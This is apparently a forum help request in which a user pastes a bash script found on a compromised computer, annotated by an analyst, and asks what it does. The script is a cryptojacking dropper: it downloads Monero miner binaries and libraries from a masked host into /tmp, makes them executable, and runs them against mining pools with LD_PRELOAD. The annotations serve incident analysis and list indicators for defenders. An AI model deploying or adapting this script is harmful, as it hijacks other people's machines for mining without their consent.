Hello,
I've found someone's footprints on my friend's computer.
Could you please explain what this guy is doing?
I see Chinese IP addresses in the log files.
#!/bin/bash
#
# Analyst annotation (code left byte-identical; only comments added).
#
# What this script does: it downloads several cryptocurrency-miner binaries
# (minergate-cli, yam, yam32, minerd_arm) together with the shared libraries
# they need into /tmp, marks the binaries executable, and then repeatedly
# tries to launch them against a Monero (xmr) mining pool. Every miner is run
# in the background and immediately waited on, so a miner that starts
# successfully keeps the script parked at the corresponding `wait` for as long
# as it runs. The `***masked_*` tokens are redactions made in this listing.
#
# Artifacts a defender can look for, all visible in the script itself:
# unexpected executables and .so files in /tmp, processes started with an
# LD_PRELOAD pointing at /tmp, and outbound connections to
# xmr.pool.minergate.com:45560 and to the second host on port 8080.
#
# Disabled: would have killed whatever process id is in $PID when the script
# exits. Because it is commented out, miners survive the script's exit.
#trap 'kill -9 $PID 2>/dev/null' EXIT
# All progress messages go to stderr (1>&2), keeping stdout empty.
echo "Downloading libraries." 1>&2
# Stage 1 payload: the minergate client, its bundled Qt and CUDA runtime
# libraries (presumably so it runs without them being installed system-wide),
# two yam builds and an ARM minerd build, all written to /tmp.
wget http://***masked_ip***/minergate-cli -O /tmp/minergate-cli
wget http://***masked_ip***/libQt5Core.so.5 -O /tmp/libQt5Core.so.5
wget http://***masked_ip***/libQt5Network.so.5 -O /tmp/libQt5Network.so.5
wget http://***masked_ip***/libQt5WebSockets.so.5 -O /tmp/libQt5WebSockets.so.5
wget http://***masked_ip***/libcudart.so.6.5 -O /tmp/libcudart.so.6.5
wget http://***masked_ip***/yam -O /tmp/yam
wget http://***masked_ip***/yam32 -O /tmp/yam32
# `-O/tmp/minerd_arm` (no space) is still a valid short-option form for wget.
wget http://***masked_ip***/minerd_arm -O/tmp/minerd_arm
# Earlier/alternate variant of the same downloads: absolute tool path and
# quiet mode (-q). Left commented out by the author.
#/usr/bin/wget http://***masked_ip***/minergate-cli -qO /tmp/minergate-cli
#/usr/bin/wget http://***masked_ip***/libQt5Core.so.5 -qO /tmp/libQt5Core.so.5
#/usr/bin/wget http://***masked_ip***/libQt5Network.so.5 -qO /tmp/libQt5Network.so.5
#/usr/bin/wget http://***masked_ip***/libQt5WebSockets.so.5 -qO /tmp/libQt5WebSockets.so.5
#/usr/bin/wget http://***masked_ip***/libcudart.so.6.5 -qO /tmp/libcudart.so.6.5
#/usr/bin/wget http://***masked_ip***/yam -qO /tmp/yam
#/usr/bin/wget http://***masked_ip***/yam32 -qO /tmp/yam32
echo "Fixing permissions." 1>&2
# Only the four miner executables are made executable; the .so files are not.
chmod +x /tmp/minergate-cli
chmod +x /tmp/yam
chmod +x /tmp/yam32
chmod +x /tmp/minerd_arm
#/bin/chmod +x /tmp/minergate-cli
#/bin/chmod +x /tmp/yam
#/bin/chmod +x /tmp/yam32
# Reports the CPU model to stderr (diagnostic output for whoever runs this).
cat /proc/cpuinfo | grep "model name" 1>&2
# Derives a thread count from the last "cache size" line of /proc/cpuinfo:
# strip the "...: " prefix and the " KB" suffix, convert KB to MB (/1024),
# then halve and subtract one.
threads=`cat /proc/cpuinfo | grep "cache size" | tail -n 1 | sed 's/.*: //g' | sed 's/ KB//g' | xargs -I{} expr {} / 1024 / 2 - 1`
# Fallback to a single thread if the computation produced nothing.
if [ -z "$threads" ]; then threads=1; fi
# First miner attempt: preload the downloaded Qt/CUDA libraries from /tmp and
# start minergate-cli mining xmr with $threads threads for the (masked)
# account, in the background. Note: the two lines below are one command.
LD_PRELOAD="/tmp/libQt5Core.so.5 /tmp/libQt5Network.so.5 /tmp/libQt5WebSockets.so.5 /tmp/libcudart.so.6.5" \
/tmp/minergate-cli -user ***email_address___*** -xmr $threads &
# Block until that miner exits (normally only happens if it failed or was
# killed).
PID=$!
wait $PID
echo "Trying MG." 1>&2
# Up to 10 further sequential attempts of the same minergate-cli command.
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
# Same LD_PRELOAD + minergate-cli invocation as above, split across two lines.
LD_PRELOAD="/tmp/libQt5Core.so.5 /tmp/libQt5Network.so.5 /tmp/libQt5WebSockets.so.5 \
/tmp/libcudart.so.6.5" /tmp/minergate-cli -user ***masked_email_address*** -xmr $threads &
PID=$!
wait $PID
done
echo "Trying YAM" 1>&2
# Fallback miner: yam, up to 10 sequential attempts. Thread count here is the
# script's first argument ($1), not $threads; if the script was started with
# no argument, $1 expands to nothing and yam receives `-t -c 1 ...`.
# Pool: stratum+tcp to xmr.pool.minergate.com port 45560, login is the
# (masked) e-mail with password "x".
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
/tmp/yam -t $1 -c 1 -M stratum+tcp://***masked_email_address***:x@xmr.pool.minergate.com:45560/xmr 1>&2 &
PID=$!
wait $PID
done
echo "Trying YAM32" 1>&2
# Same as above with the 32-bit yam build.
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
/tmp/yam32 -t $1 -c 1 -M stratum+tcp://***masked_email_address***:x@xmr.pool.minergate.com:45560/xmr 1>&2 &
PID=$!
wait $PID
done
# Stage 2 payload: a second set of shared libraries (curl/ssl/gnutls/krb5/ldap
# dependency chain) fetched into /tmp; the commented-out LD_PRELOAD further
# down lists exactly these files in front of /tmp/minerd_arm.
wget http://***masked_ip***/libjansson.so.4 -O /tmp/libjansson.so.4
wget http://***masked_ip***/libcrypto.so.1.0.0 -O /tmp/libcrypto.so.1.0.0
wget http://***masked_ip***/libcurl.so.4 -O /tmp/libcurl.so.4
wget http://***masked_ip***/libidn.so.11 -O /tmp/libidn.so.11
wget http://***masked_ip***/librtmp.so.1 -O /tmp/librtmp.so.1
wget http://***masked_ip***/libgnutls-deb0.so.28 -O /tmp/libgnutls-deb0.so.28
wget http://***masked_ip***/libp11-kit.so.0 -O /tmp/libp11-kit.so.0
wget http://***masked_ip***/libffi.so.6 -O /tmp/libffi.so.6
wget http://***masked_ip***/libtasn1.so.6 -O /tmp/libtasn1.so.6
wget http://***masked_ip***/libnettle.so.4 -O /tmp/libnettle.so.4
wget http://***masked_ip***/libhogweed.so.2 -O /tmp/libhogweed.so.2
wget http://***masked_ip***/libgmp.so.10 -O /tmp/libgmp.so.10
wget http://***masked_ip***/libssh2.so.1 -O /tmp/libssh2.so.1
wget http://***masked_ip***/libssl.so.1.0.0 -O /tmp/libssl.so.1.0.0
wget http://***masked_ip***/libgssapi_krb5.so.2 -O /tmp/libgssapi_krb5.so.2
wget http://***masked_ip***/libkrb5.so.3 -O /tmp/libkrb5.so.3
wget http://***masked_ip***/libk5crypto.so.3 -O /tmp/libk5crypto.so.3
wget http://***masked_ip***/libkrb5support.so.0 -O /tmp/libkrb5support.so.0
wget http://***masked_ip***/libkeyutils.so.1 -O /tmp/libkeyutils.so.1
wget http://***masked_ip***/libcom_err.so.2 -O /tmp/libcom_err.so.2
wget http://***masked_ip***/liblber-2.4.so.2 -O /tmp/liblber-2.4.so.2
wget http://***masked_ip***/libldap_r-2.4.so.2 -O /tmp/libldap_r-2.4.so.2
wget http://***masked_ip***/libsasl2.so.2 -O /tmp/libsasl2.so.2
echo "Trying ARM minerd" 1>&2
# Last fallback: minerd_arm, up to 10 sequential attempts, mining cryptonight
# against a second (masked) host on port 8080 with user "123456", password
# "1" and 2 threads.
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
# NOTE(review): the `#` disables only this one line. A trailing `\` inside a
# comment does not continue it, so the next four lines run as a separate
# command whose first word is /tmp/libkrb5support.so.0 (a library, and not
# one that was chmod'ed), with the remaining paths and the minerd_arm options
# passed as its arguments. It is also not backgrounded, so `$!` below still
# refers to the previous background job. As written, this branch is unlikely
# to have started minerd_arm at all.
#LD_PRELOAD="/tmp/libsasl2.so.2 /tmp/libldap_r-2.4.so.2 /tmp/liblber-2.4.so.2 /tmp/libcom_err.so.2 /tmp/libkeyutils.so.1 \
/tmp/libkrb5support.so.0 /tmp/libk5crypto.so.3 /tmp/libkrb5.so.3 /tmp/libgssapi_krb5.so.2 /tmp/libssl.so.1.0.0 /tmp/libssh2.so.1 \
/tmp/libgmp.so.10 /tmp/libhogweed.so.2 /tmp/libnettle.so.4 /tmp/libtasn1.so.6 /tmp/libffi.so.6 /tmp/libp11-kit.so.0 /tmp/libgnutls-deb0.so.28 \
/tmp/librtmp.so.1 /tmp/libidn.so.11 /tmp/libcurl.so.4 /tmp/libjansson.so.4 /tmp/libcrypto.so.1.0.0" /tmp/minerd_arm -a cryptonight \
-o stratum+tcp://***other_suspicious_ip***:8080 -u 123456 -p 1 -t 2
PID=$!
wait $PID
done
# Idle for a minute before the script ends.
sleep 60
Thanks
Boris